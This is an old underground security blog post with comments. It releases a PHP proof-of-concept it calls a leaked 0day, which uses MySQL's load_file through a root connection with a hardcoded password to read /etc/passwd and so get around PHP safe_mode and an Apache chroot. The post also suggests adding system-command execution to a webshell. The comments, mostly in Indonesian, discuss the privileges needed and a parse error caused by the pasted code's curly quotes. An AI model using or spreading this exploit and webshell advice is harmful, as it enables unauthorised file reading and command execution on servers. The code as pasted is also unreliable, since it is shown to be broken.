Posted by kecoak on Oct 22, 2007

Safe mode PHP and apache chroot bypass

Categories: 0day, Underground, Websecurity | 5 comments

Someone /at/ kecoak elektronik just lost his private 0day, the 0day technique to bypass safemode php and apache chroot using mysql has been leaked and publish on public disclosure site. No need to keep it anymore, so he just released the PoC to the public:

——————- Cut here ————————

<?php
/*
It has been a while i make this exploit to be a private collection
I use this exploit to bypass :
– Safe_mode PHP all version
– By default install apache in OpenBSD 3.x (dunno exactly) is chroot in /var/www/
Tested :
Ubuntu 6.06 – Fedora Core 5 – OpenBSD 3.9
By : Someone [at] k-elektronik
*/


echo “safe_mode = ” . ini_get(‘safe_mode’) . “n”;
$conn = mysql_connect(“localhost”, “root”, “rahasia”);
$result = mysql_query(“select load_file(“/etc/passwd”) as password”);
while($row = mysql_fetch_object($result))
echo $row->password;

?>

——————- Cut here ————————

Just play around do_system() function to get the system command executed. Take the vi and put those function on ur webshell.

Post a Comment

5 Responses to “Safe mode PHP and apache chroot bypass”

  1. someone[at]home says:
    October 22, 2007 at 10:35 pm

    $conn = mysql_connect(”localhost”, “root”, “rahasia”);

    Reply
  2. Someone [at] kecoak says:
    October 23, 2007 at 3:15 pm

    Sebenernya ga root juga bisa selama diya di grant FILE privileges dan lumayan banyak lo, mungkin itu tambahan dari saya ^^

    Salam,

    Reply
  3. aa says:
    October 24, 2007 at 3:12 am

    Parse error: parse error, expecting `’,” or `’;” in /usr/local/psa/home/vhosts/xxxxx/httpdocs/admin/pwn.php on line 2

    why?

    Reply
  4. someone[at]home says:
    October 27, 2007 at 9:01 am

    hihihi, itu intinya komen saya mbah, meskipun ga legkap, ternyata si mbah ngeh 🙂

    tapi kan ada trik lain yang dah lumayan lama di publish mbah 🙂
    coba cek deh arsip 2 or 3 taun yang lalu 🙂

    Reply
  5. Someone [at] kecoak says:
    October 29, 2007 at 2:05 pm

    He he, emang trik bypass safe_mode banyak…

    Kalo sudah lama dipublish ya patchnya mestinya juga sudah nongol
    kecuali adminnya teledor dan ga ngepatch, kecuali sebuah vulnerability tetep di jaga private, kalo trik lain buat bypass yang sudah lama di publish bukan cuma “ada” tapi “banyak banget”

    Intinya bukan “bisa bypass apa enggak” tapi “trik yang dipake buat bypassnya”, trik jelas banyak, cuma mana yang sudah ada patchnya mana yang belum gitukan yaa makna 0day

    Reply

Trackbacks/Pingbacks

  1. Safe mode PHP and apache chroot bypass | MySQL Security - [...] posted here: Safe mode PHP and apache chroot bypass mysql arraymysql arrayRelated Posts Apache articles from [...]

Leave a Reply

Your email address will not be published. Required fields are marked *